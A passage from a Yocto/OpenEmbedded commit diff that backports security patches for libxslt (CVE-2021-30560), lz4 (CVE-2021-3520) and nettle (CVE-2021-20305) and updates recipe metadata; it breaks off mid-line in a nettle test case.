+Whitespace from input documents is already stripped, so there's no
+need to strip it again. Under certain circumstances, xsltApplyTemplates
+could be fooled into deleting text nodes that are still referenced,
+resulting in a use-after-free.
+
+2. The DTD
+
+The DTD was only unlinked, but there's no good reason to do this just
+now. Maybe it was meant as a micro-optimization.
+
+3. Unknown nodes
+
+Useless and dangerous as well, especially with XInclude nodes.
+See https://gitlab.gnome.org/GNOME/libxml2/-/issues/268
+
+Simply stop trying to uselessly delete nodes when applying a template.
+This part of the code is probably a leftover from a time where
+xsltApplyStripSpaces wasn't implemented yet. Also note that
+xsltApplyTemplates with a select expression never tried to delete
+nodes.
+
+Also stop xsltDefaultProcessOneNode from deleting nodes for the same
+reasons.
+
+This fixes CVE-2021-30560.
+
+CVE: CVE-2021-30560
+Upstream-Status: Backport [https://github.com/GNOME/libxslt/commit/50f9c9cd3b7dfe9b3c8c795247752d1fdcadcac8.patch]
+Comment: No change in any hunk
+Signed-off-by: Omkar Patil <Omkar.Patil@kpit.com>
+
+---
+ libxslt/transform.c | 119 +++-----------------------------------------
+ 1 file changed, 7 insertions(+), 112 deletions(-)
+
+diff --git a/libxslt/transform.c b/libxslt/transform.c
+index 04522154..3aba354f 100644
+--- a/libxslt/transform.c
++++ b/libxslt/transform.c
+@@ -1895,7 +1895,7 @@ static void
+ xsltDefaultProcessOneNode(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ 			  xsltStackElemPtr params) {
+     xmlNodePtr copy;
+-    xmlNodePtr delete = NULL, cur;
++    xmlNodePtr cur;
+     int nbchild = 0, oldSize;
+     int childno = 0, oldPos;
+     xsltTemplatePtr template;
+@@ -1968,54 +1968,13 @@ xsltDefaultProcessOneNode(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ 	    return;
+     }
+     /*
+-     * Handling of Elements: first pass, cleanup and counting
++     * Handling of Elements: first pass, counting
+      */
+     cur = node->children;
+     while (cur != NULL) {
+-	switch (cur->type) {
+-	    case XML_TEXT_NODE:
+-	    case XML_CDATA_SECTION_NODE:
+-	    case XML_DOCUMENT_NODE:
+-	    case XML_HTML_DOCUMENT_NODE:
+-	    case XML_ELEMENT_NODE:
+-	    case XML_PI_NODE:
+-	    case XML_COMMENT_NODE:
+-		nbchild++;
+-		break;
+-            case XML_DTD_NODE:
+-		/* Unlink the DTD, it's still reachable using doc->intSubset */
+-		if (cur->next != NULL)
+-		    cur->next->prev = cur->prev;
+-		if (cur->prev != NULL)
+-		    cur->prev->next = cur->next;
+-		break;
+-	    default:
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+-		XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
+-		 "xsltDefaultProcessOneNode: skipping node type %d\n",
+-		                 cur->type));
+-#endif
+-		delete = cur;
+-	}
++	if (IS_XSLT_REAL_NODE(cur))
++	    nbchild++;
+ 	cur = cur->next;
+-	if (delete != NULL) {
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+-	    XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
+-		 "xsltDefaultProcessOneNode: removing ignorable blank node\n"));
+-#endif
+-	    xmlUnlinkNode(delete);
+-	    xmlFreeNode(delete);
+-	    delete = NULL;
+-	}
+-    }
+-    if (delete != NULL) {
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+-	XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
+-	     "xsltDefaultProcessOneNode: removing ignorable blank node\n"));
+-#endif
+-	xmlUnlinkNode(delete);
+-	xmlFreeNode(delete);
+-	delete = NULL;
+     }
+ 
+     /*
+@@ -4864,7 +4823,7 @@ xsltApplyTemplates(xsltTransformContextPtr ctxt, xmlNodePtr node,
+     xsltStylePreCompPtr comp = (xsltStylePreCompPtr) castedComp;
+ #endif
+     int i;
+-    xmlNodePtr cur, delNode = NULL, oldContextNode;
++    xmlNodePtr cur, oldContextNode;
+     xmlNodeSetPtr list = NULL, oldList;
+     xsltStackElemPtr withParams = NULL;
+     int oldXPProximityPosition, oldXPContextSize;
+@@ -4998,73 +4957,9 @@ xsltApplyTemplates(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ 	else
+ 	    cur = NULL;
+ 	while (cur != NULL) {
+-	    switch (cur->type) {
+-		case XML_TEXT_NODE:
+-		    if ((IS_BLANK_NODE(cur)) &&
+-			(cur->parent != NULL) &&
+-			(cur->parent->type == XML_ELEMENT_NODE) &&
+-			(ctxt->style->stripSpaces != NULL)) {
+-			const xmlChar *val;
+-
+-			if (cur->parent->ns != NULL) {
+-			    val = (const xmlChar *)
+-				  xmlHashLookup2(ctxt->style->stripSpaces,
+-						 cur->parent->name,
+-						 cur->parent->ns->href);
+-			    if (val == NULL) {
+-				val = (const xmlChar *)
+-				  xmlHashLookup2(ctxt->style->stripSpaces,
+-						 BAD_CAST "*",
+-						 cur->parent->ns->href);
+-			    }
+-			} else {
+-			    val = (const xmlChar *)
+-				  xmlHashLookup2(ctxt->style->stripSpaces,
+-						 cur->parent->name, NULL);
+-			}
+-			if ((val != NULL) &&
+-			    (xmlStrEqual(val, (xmlChar *) "strip"))) {
+-			    delNode = cur;
+-			    break;
+-			}
+-		    }
+-		    /* Intentional fall-through */
+-		case XML_ELEMENT_NODE:
+-		case XML_DOCUMENT_NODE:
+-		case XML_HTML_DOCUMENT_NODE:
+-		case XML_CDATA_SECTION_NODE:
+-		case XML_PI_NODE:
+-		case XML_COMMENT_NODE:
+-		    xmlXPathNodeSetAddUnique(list, cur);
+-		    break;
+-		case XML_DTD_NODE:
+-		    /* Unlink the DTD, it's still reachable
+-		     * using doc->intSubset */
+-		    if (cur->next != NULL)
+-			cur->next->prev = cur->prev;
+-		    if (cur->prev != NULL)
+-			cur->prev->next = cur->next;
+-		    break;
+-		case XML_NAMESPACE_DECL:
+-		    break;
+-		default:
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+-		    XSLT_TRACE(ctxt,XSLT_TRACE_APPLY_TEMPLATES,xsltGenericDebug(xsltGenericDebugContext,
+-		     "xsltApplyTemplates: skipping cur type %d\n",
+-				     cur->type));
+-#endif
+-		    delNode = cur;
+-	    }
++            if (IS_XSLT_REAL_NODE(cur))
++		xmlXPathNodeSetAddUnique(list, cur);
+ 	    cur = cur->next;
+-	    if (delNode != NULL) {
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+-		XSLT_TRACE(ctxt,XSLT_TRACE_APPLY_TEMPLATES,xsltGenericDebug(xsltGenericDebugContext,
+-		     "xsltApplyTemplates: removing ignorable blank cur\n"));
+-#endif
+-		xmlUnlinkNode(delNode);
+-		xmlFreeNode(delNode);
+-		delNode = NULL;
+-	    }
+ 	}
+     }
+ 
diff --git a/meta/recipes-support/libxslt/libxslt_1.1.34.bb b/meta/recipes-support/libxslt/libxslt_1.1.34.bb
index 1961bb5b31..4755677bec 100644
--- a/meta/recipes-support/libxslt/libxslt_1.1.34.bb
+++ b/meta/recipes-support/libxslt/libxslt_1.1.34.bb
@@ -1,4 +1,9 @@
 SUMMARY = "GNOME XSLT library"
+DESCRIPTION = "libxslt is the XSLT C parser and toolkit developed for the Gnome project. \
+XSLT itself is a an XML language to define transformation for XML. Libxslt is based on \
+libxml2 the XML C library developed for the GNOME project. It also implements most of \
+the EXSLT set of processor-portable extensions functions and some of Saxon's evaluate \
+and expressions extensions."
 HOMEPAGE = "http://xmlsoft.org/XSLT/"
 BUGTRACKER = "https://bugzilla.gnome.org/"
 
@@ -9,6 +14,7 @@ SECTION = "libs"
 DEPENDS = "libxml2"
 
 SRC_URI = "http://xmlsoft.org/sources/libxslt-${PV}.tar.gz \
+           file://CVE-2021-30560.patch \
           "
 
 SRC_URI[md5sum] = "db8765c8d076f1b6caafd9f2542a304a"
@@ -16,6 +22,10 @@ SRC_URI[sha256sum] = "98b1bd46d6792925ad2dfe9a87452ea2adebf69dcb9919ffd55bf926a7
 
 UPSTREAM_CHECK_REGEX = "libxslt-(?P<pver>\d+(\.\d+)+)\.tar"
 
+# We have libxml2 2.9.10 and we don't link statically with it anyway
+# so this isn't an issue.
+CVE_CHECK_WHITELIST += "CVE-2022-29824"
+
 S = "${WORKDIR}/libxslt-${PV}"
 
 BINCONFIG = "${bindir}/xslt-config"
diff --git a/meta/recipes-support/lz4/files/CVE-2021-3520.patch b/meta/recipes-support/lz4/files/CVE-2021-3520.patch
new file mode 100644
index 0000000000..5ac8f6691f
--- /dev/null
+++ b/meta/recipes-support/lz4/files/CVE-2021-3520.patch
@@ -0,0 +1,27 @@
+From 8301a21773ef61656225e264f4f06ae14462bca7 Mon Sep 17 00:00:00 2001
+From: Jasper Lievisse Adriaanse <j@jasper.la>
+Date: Fri, 26 Feb 2021 15:21:20 +0100
+Subject: [PATCH] Fix potential memory corruption with negative memmove() size
+
+Upstream-Status: Backport
+https://github.com/lz4/lz4/commit/8301a21773ef61656225e264f4f06ae14462bca7#diff-7055e9cf14c488aea9837aaf9f528b58ee3c22988d7d0d81d172ec62d94a88a7
+CVE: CVE-2021-3520
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ lib/lz4.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: git/lib/lz4.c
+===================================================================
+--- git.orig/lib/lz4.c
++++ git/lib/lz4.c
+@@ -1665,7 +1665,7 @@ LZ4_decompress_generic(
+                  const size_t dictSize         /* note : = 0 if noDict */
+                  )
+ {
+-    if (src == NULL) { return -1; }
++    if ((src == NULL) || (outputSize < 0)) { return -1; }
+ 
+     {   const BYTE* ip = (const BYTE*) src;
+         const BYTE* const iend = ip + srcSize;
diff --git a/meta/recipes-support/lz4/lz4_1.9.2.bb b/meta/recipes-support/lz4/lz4_1.9.2.bb
index 6510156ed0..bc11a57eb5 100644
--- a/meta/recipes-support/lz4/lz4_1.9.2.bb
+++ b/meta/recipes-support/lz4/lz4_1.9.2.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Extremely Fast Compression algorithm"
 DESCRIPTION = "LZ4 is a very fast lossless compression algorithm, providing compression speed at 400 MB/s per core, scalable with multi-cores CPU. It also features an extremely fast decoder, with speed in multiple GB/s per core, typically reaching RAM speed limits on multi-core systems."
+HOMEPAGE = "https://github.com/lz4/lz4"
 
 LICENSE = "BSD | BSD-2-Clause | GPL-2.0"
 LIC_FILES_CHKSUM = "file://lib/LICENSE;md5=ebc2ea4814a64de7708f1571904b32cc \
@@ -11,8 +12,13 @@ PE = "1"
 
 SRCREV = "fdf2ef5809ca875c454510610764d9125ef2ebbd"
 
-SRC_URI = "git://github.com/lz4/lz4.git \
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
+SRC_URI = "git://github.com/lz4/lz4.git;branch=dev;protocol=https \
            file://run-ptest \
+           file://CVE-2021-3520.patch \
            "
 UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)"
 
@@ -21,7 +27,7 @@ S = "${WORKDIR}/git"
 # Fixed in r118, which is larger than the current version.
 CVE_CHECK_WHITELIST += "CVE-2014-4715"
 
-EXTRA_OEMAKE = "PREFIX=${prefix} CC='${CC}' DESTDIR=${D} LIBDIR=${libdir} INCLUDEDIR=${includedir} BUILD_STATIC=no"
+EXTRA_OEMAKE = "PREFIX=${prefix} CC='${CC}' CFLAGS='${CFLAGS}' DESTDIR=${D} LIBDIR=${libdir} INCLUDEDIR=${includedir} BUILD_STATIC=no"
 
 do_install() {
 	oe_runmake install
diff --git a/meta/recipes-support/lzo/lzo_2.10.bb b/meta/recipes-support/lzo/lzo_2.10.bb
index 8eefec3cc9..f0c8631aea 100644
--- a/meta/recipes-support/lzo/lzo_2.10.bb
+++ b/meta/recipes-support/lzo/lzo_2.10.bb
@@ -1,4 +1,6 @@
 SUMMARY = "Lossless data compression library"
+DESCRIPTION = "A portable lossless data compression library written in \
+ANSI C that offers pretty fast compression and *extremely* fast decompression. "
 HOMEPAGE = "http://www.oberhumer.com/opensource/lzo/"
 SECTION = "libs"
 LICENSE = "GPLv2+"
@@ -16,6 +18,8 @@ SRC_URI[sha256sum] = "c0f892943208266f9b6543b3ae308fab6284c5c90e627931446fb49b42
 
 inherit autotools ptest
 
+CVE_PRODUCT = "lzo oberhumer:lzo2"
+
 EXTRA_OECONF = "--enable-shared"
 
 do_install_ptest() {
diff --git a/meta/recipes-support/lzop/lzop_1.04.bb b/meta/recipes-support/lzop/lzop_1.04.bb
index b50c230437..59c2003b74 100644
--- a/meta/recipes-support/lzop/lzop_1.04.bb
+++ b/meta/recipes-support/lzop/lzop_1.04.bb
@@ -5,6 +5,7 @@ gzip are much higher compression and decompression speed at the cost of some \n\
 compression ratio. The lzop compression utility was designed with the goals \n\
 of reliability, speed, portability and with reasonable drop-in compatibility \n\
 to gzip."
+HOMEPAGE = "http://www.lzop.org/"
 DEPENDS += "lzo"
 
 LICENSE = "GPLv2+"
diff --git a/meta/recipes-support/mpfr/mpfr_4.0.2.bb b/meta/recipes-support/mpfr/mpfr_4.0.2.bb
index 00c2dc2fe9..0ac73f031f 100644
--- a/meta/recipes-support/mpfr/mpfr_4.0.2.bb
+++ b/meta/recipes-support/mpfr/mpfr_4.0.2.bb
@@ -1,4 +1,5 @@
 SUMMARY = "C library for multiple-precision floating-point computations with exact rounding"
+DESCRIPTION = "The GNU Multiple Precision Floating-Point Reliable Library (GNU MPFR) is a GNU portable C library for arbitrary-precision binary floating-point computation with correct rounding, based on GNU Multi-Precision Library. MPFR's computation is both efficient and has a well-defined semantics: the functions are completely specified on all the possible operands and the results do not depend on the platform."
 HOMEPAGE = "https://www.mpfr.org/"
 LICENSE = "LGPLv3+"
 SECTION = "devel"
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch
new file mode 100644
index 0000000000..cfc0f382fa
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch
@@ -0,0 +1,215 @@
+Backport of:
+
+From a63893791280d441c713293491da97c79c0950fe Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Thu, 11 Mar 2021 19:37:41 +0100
+Subject: [PATCH] New functions ecc_mod_mul_canonical and
+ ecc_mod_sqr_canonical.
+
+* ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+New functions.
+* ecc-internal.h: Declare and document new functions.
+* curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical.
+* curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical.
+* ecc-eh-to-a.c (ecc_eh_to_a): Likewise.
+* ecc-j-to-a.c (ecc_j_to_a): Likewise.
+* ecc-mul-m.c (ecc_mul_m): Likewise.
+
+(cherry picked from commit 2bf497ba4d6acc6f352bca015837fad33008565c)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-1.patch
+CVE: CVE-2021-20305 dep1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog            | 11 +++++++++++
+ curve25519-eh-to-x.c |  6 +-----
+ curve448-eh-to-x.c   |  5 +----
+ ecc-eh-to-a.c        | 12 ++----------
+ ecc-internal.h       | 15 +++++++++++++++
+ ecc-j-to-a.c         | 15 +++------------
+ ecc-mod-arith.c      | 24 ++++++++++++++++++++++++
+ ecc-mul-m.c          |  6 ++----
+ 8 files changed, 59 insertions(+), 35 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index fd138d82..5cc5c188 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,3 +1,14 @@
+#+2021-03-11  Niels Möller  <nisse@lysator.liu.se>
+#+
+#+	* ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+#+	New functions.
+#+	* ecc-internal.h: Declare and document new functions.
+#+	* curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical.
+#+	* curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical.
+#+	* ecc-eh-to-a.c (ecc_eh_to_a): Likewise.
+#+	* ecc-j-to-a.c (ecc_j_to_a): Likewise.
+#+	* ecc-mul-m.c (ecc_mul_m): Likewise.
+#+
+# 2021-02-17  Niels Möller  <nisse@lysator.liu.se>
+# 
+# 	* Released Nettle-3.7.1.
+Index: nettle-3.5.1/curve25519-eh-to-x.c
+===================================================================
+--- nettle-3.5.1.orig/curve25519-eh-to-x.c
++++ nettle-3.5.1/curve25519-eh-to-x.c
+@@ -53,7 +53,6 @@ curve25519_eh_to_x (mp_limb_t *xp, const
+ #define t2 (scratch + 2*ecc->p.size)
+ 
+   const struct ecc_curve *ecc = &_nettle_curve25519;
+-  mp_limb_t cy;
+ 
+   /* If u = U/W and v = V/W are the coordiantes of the point on the
+      Edwards curve we get the curve25519 x coordinate as
+@@ -69,10 +68,7 @@ curve25519_eh_to_x (mp_limb_t *xp, const
+   ecc->p.invert (&ecc->p, t1, t0, t2 + ecc->p.size);
+   
+   ecc_modp_add (ecc, t0, wp, vp);
+-  ecc_modp_mul (ecc, t2, t0, t1);
+-
+-  cy = mpn_sub_n (xp, t2, ecc->p.m, ecc->p.size);
+-  cnd_copy (cy, xp, t2, ecc->p.size);
++  ecc_mod_mul_canonical (&ecc->p, xp, t0, t1, t2);
+ #undef vp
+ #undef wp
+ #undef t0
+Index: nettle-3.5.1/ecc-eh-to-a.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-eh-to-a.c
++++ nettle-3.5.1/ecc-eh-to-a.c
+@@ -59,9 +59,7 @@ ecc_eh_to_a (const struct ecc_curve *ecc
+   /* Needs 2*size + scratch for the invert call. */
+   ecc->p.invert (&ecc->p, izp, zp, tp + ecc->p.size);
+ 
+-  ecc_modp_mul (ecc, tp, xp, izp);
+-  cy = mpn_sub_n (r, tp, ecc->p.m, ecc->p.size);
+-  cnd_copy (cy, r, tp, ecc->p.size);
++  ecc_mod_mul_canonical (&ecc->p, r, xp, izp, tp);
+ 
+   if (op)
+     {
+@@ -81,7 +79,5 @@ ecc_eh_to_a (const struct ecc_curve *ecc
+ 	}
+       return;
+     }
+-  ecc_modp_mul (ecc, tp, yp, izp);
+-  cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size);
+-  cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size);
++  ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, yp, izp, tp);
+ }
+Index: nettle-3.5.1/ecc-internal.h
+===================================================================
+--- nettle-3.5.1.orig/ecc-internal.h
++++ nettle-3.5.1/ecc-internal.h
+@@ -49,6 +49,8 @@
+ #define ecc_mod_submul_1 _nettle_ecc_mod_submul_1
+ #define ecc_mod_mul _nettle_ecc_mod_mul
+ #define ecc_mod_sqr _nettle_ecc_mod_sqr
++#define ecc_mod_mul_canonical _nettle_ecc_mod_mul_canonical
++#define ecc_mod_sqr_canonical _nettle_ecc_mod_sqr_canonical
+ #define ecc_mod_random _nettle_ecc_mod_random
+ #define ecc_mod _nettle_ecc_mod
+ #define ecc_mod_inv _nettle_ecc_mod_inv
+@@ -263,6 +265,19 @@ ecc_mod_sqr (const struct ecc_modulo *m,
+ #define ecc_modq_mul(ecc, r, a, b) \
+   ecc_mod_mul (&(ecc)->q, (r), (a), (b))
+ 
++/* These mul and sqr functions produce a canonical result, 0 <= R < M.
++   Requirements on input and output areas are similar to the above
++   functions, except that it is *not* allowed to pass rp = rp +
++   m->size.
++ */
++void
++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++		       const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp);
++
++void
++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++		       const mp_limb_t *ap, mp_limb_t *tp);
++
+ /* mod q operations. */
+ void
+ ecc_mod_random (const struct ecc_modulo *m, mp_limb_t *xp,
+Index: nettle-3.5.1/ecc-j-to-a.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-j-to-a.c
++++ nettle-3.5.1/ecc-j-to-a.c
+@@ -51,8 +51,6 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+ #define izBp (scratch + 3*ecc->p.size)
+ #define tp    scratch
+ 
+-  mp_limb_t cy;
+-
+   if (ecc->use_redc)
+     {
+       /* Set v = (r_z / B^2)^-1,
+@@ -86,17 +84,14 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+       ecc_modp_sqr (ecc, iz2p, izp);
+     }
+ 
+-  ecc_modp_mul (ecc, iz3p, iz2p, p);
+-  /* ecc_modp (and ecc_modp_mul) may return a value up to 2p - 1, so
+-     do a conditional subtraction. */
+-  cy = mpn_sub_n (r, iz3p, ecc->p.m, ecc->p.size);
+-  cnd_copy (cy, r, iz3p, ecc->p.size);
++  ecc_mod_mul_canonical (&ecc->p, r, iz2p, p, iz3p);
+ 
+   if (op)
+     {
+       /* Skip y coordinate */
+       if (op > 1)
+ 	{
++	  mp_limb_t cy;
+ 	  /* Also reduce the x coordinate mod ecc->q. It should
+ 	     already be < 2*ecc->q, so one subtraction should
+ 	     suffice. */
+@@ -106,10 +101,7 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+       return;
+     }
+   ecc_modp_mul (ecc, iz3p, iz2p, izp);
+-  ecc_modp_mul (ecc, tp, iz3p, p + ecc->p.size);
+-  /* And a similar subtraction. */
+-  cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size);
+-  cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size);
++  ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, iz3p, p + ecc->p.size, iz3p);
+ 
+ #undef izp
+ #undef up
+Index: nettle-3.5.1/ecc-mod-arith.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-mod-arith.c
++++ nettle-3.5.1/ecc-mod-arith.c
+@@ -119,6 +119,30 @@ ecc_mod_mul (const struct ecc_modulo *m,
+ }
+ 
+ void
++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++		       const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp)
++{
++  mp_limb_t cy;
++  mpn_mul_n (tp + m->size, ap, bp, m->size);
++  m->reduce (m, tp + m->size);
++
++  cy = mpn_sub_n (rp, tp + m->size, m->m, m->size);
++  cnd_copy (cy, rp, tp + m->size, m->size);
++}
++
++void
++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++		       const mp_limb_t *ap, mp_limb_t *tp)
++{
++  mp_limb_t cy;
++  mpn_sqr (tp + m->size, ap, m->size);
++  m->reduce (m, tp + m->size);
++
++  cy = mpn_sub_n (rp, tp + m->size, m->m, m->size);
++  cnd_copy (cy, rp, tp + m->size, m->size);
++}
++
++void
+ ecc_mod_sqr (const struct ecc_modulo *m, mp_limb_t *rp,
+ 	     const mp_limb_t *ap)
+ {
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch
new file mode 100644
index 0000000000..bb56b14c8c
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch
@@ -0,0 +1,53 @@
+Backport of:
+
+From 971bed6ab4b27014eb23085e8176917e1a096fd5 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 17:26:37 +0100
+Subject: [PATCH] Use ecc_mod_mul_canonical for point comparison.
+
+* eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+
+(cherry picked from commit 5b7608fde3a6d2ab82bffb35db1e4e330927c906)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-2.patch
+CVE: CVE-2021-20305 dep2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog      | 4 ++++
+ eddsa-verify.c | 9 ++-------
+ 2 files changed, 6 insertions(+), 7 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 5cc5c188..2a9217a6 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,3 +1,7 @@
+#+2021-03-13  Niels Möller  <nisse@lysator.liu.se>
+#+
+#+	* eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+#+
+# 2021-03-11  Niels Möller  <nisse@lysator.liu.se>
+# 
+# 	* ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+Index: nettle-3.5.1/eddsa-verify.c
+===================================================================
+--- nettle-3.5.1.orig/eddsa-verify.c
++++ nettle-3.5.1/eddsa-verify.c
+@@ -53,13 +53,8 @@ equal_h (const struct ecc_modulo *p,
+ #define t0 scratch
+ #define t1 (scratch + p->size)
+ 
+-  ecc_mod_mul (p, t0, x1, z2);
+-  if (mpn_cmp (t0, p->m, p->size) >= 0)
+-    mpn_sub_n (t0, t0, p->m, p->size);
+-
+-  ecc_mod_mul (p, t1, x2, z1);
+-  if (mpn_cmp (t1, p->m, p->size) >= 0)
+-    mpn_sub_n (t1, t1, p->m, p->size);
++  ecc_mod_mul_canonical (p, t0, x1, z2, t0);
++  ecc_mod_mul_canonical (p, t1, x2, z1, t1);
+ 
+   return mpn_cmp (t0, t1, p->size) == 0;
+ 
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch
new file mode 100644
index 0000000000..15a892ecdf
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch
@@ -0,0 +1,122 @@
+Backport of:
+
+From 74ee0e82b6891e090f20723750faeb19064e31b2 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 15:19:19 +0100
+Subject: [PATCH] Fix bug in ecc_ecdsa_verify.
+
+* ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+to compute the scalars used for ecc multiplication.
+* testsuite/ecdsa-verify-test.c (test_main): Add test case that
+triggers an assert on 64-bit platforms, without above fix.
+* testsuite/ecdsa-sign-test.c (test_main): Test case generating
+the same signature.
+
+(cherry picked from commit 2397757b3f95fcae1e2d3011bf99ca5b5438378f)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-3.patch
+CVE: CVE-2021-20305 dep3
+[Minor fixup on _nettle_secp_224r1]
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog                     | 10 +++++++++-
+ ecc-ecdsa-verify.c            |  4 ++--
+ testsuite/ecdsa-sign-test.c   | 13 +++++++++++++
+ testsuite/ecdsa-verify-test.c | 20 ++++++++++++++++++++
+ 4 files changed, 44 insertions(+), 3 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 2a9217a6..63848f53 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,7 +1,15 @@
+# 2021-03-13  Niels Möller  <nisse@lysator.liu.se>
+# 
+#-	* eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+#+	* ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+#+	to compute the scalars used for ecc multiplication.
+#+	* testsuite/ecdsa-verify-test.c (test_main): Add test case that
+#+	triggers an assert on 64-bit platforms, without above fix.
+#+	* testsuite/ecdsa-sign-test.c (test_main): Test case generating
+#+	the same signature.
+#+
+#+2021-03-13  Niels Möller  <nisse@lysator.liu.se>
+# 
+#+	* eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+# 2021-03-11  Niels Möller  <nisse@lysator.liu.se>
+# 
+# 	* ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+Index: nettle-3.5.1/ecc-ecdsa-verify.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-ecdsa-verify.c
++++ nettle-3.5.1/ecc-ecdsa-verify.c
+@@ -112,10 +112,10 @@ ecc_ecdsa_verify (const struct ecc_curve
+ 
+   /* u1 = h / s, P1 = u1 * G */
+   ecc_hash (&ecc->q, hp, length, digest);
+-  ecc_modq_mul (ecc, u1, hp, sinv);
++  ecc_mod_mul_canonical (&ecc->q, u1, hp, sinv, u1);
+ 
+   /* u2 = r / s, P2 = u2 * Y */
+-  ecc_modq_mul (ecc, u2, rp, sinv);
++  ecc_mod_mul_canonical (&ecc->q, u2, rp, sinv, u2);
+ 
+    /* Total storage: 5*ecc->p.size + ecc->mul_itch */
+   ecc->mul (ecc, P2, u2, pp, u2 + ecc->p.size);
+Index: nettle-3.5.1/testsuite/ecdsa-sign-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/ecdsa-sign-test.c
++++ nettle-3.5.1/testsuite/ecdsa-sign-test.c
+@@ -58,6 +58,19 @@ test_ecdsa (const struct ecc_curve *ecc,
+ void
+ test_main (void)
+ {
++  /* Producing the signature for corresponding test in
++     ecdsa-verify-test.c, with special u1 and u2. */
++  test_ecdsa (&_nettle_secp_224r1,
++	      "99b5b787484def12894ca507058b3bf5"
++	      "43d72d82fa7721d2e805e5e6",
++	      "2",
++	      SHEX("cdb887ac805a3b42e22d224c85482053"
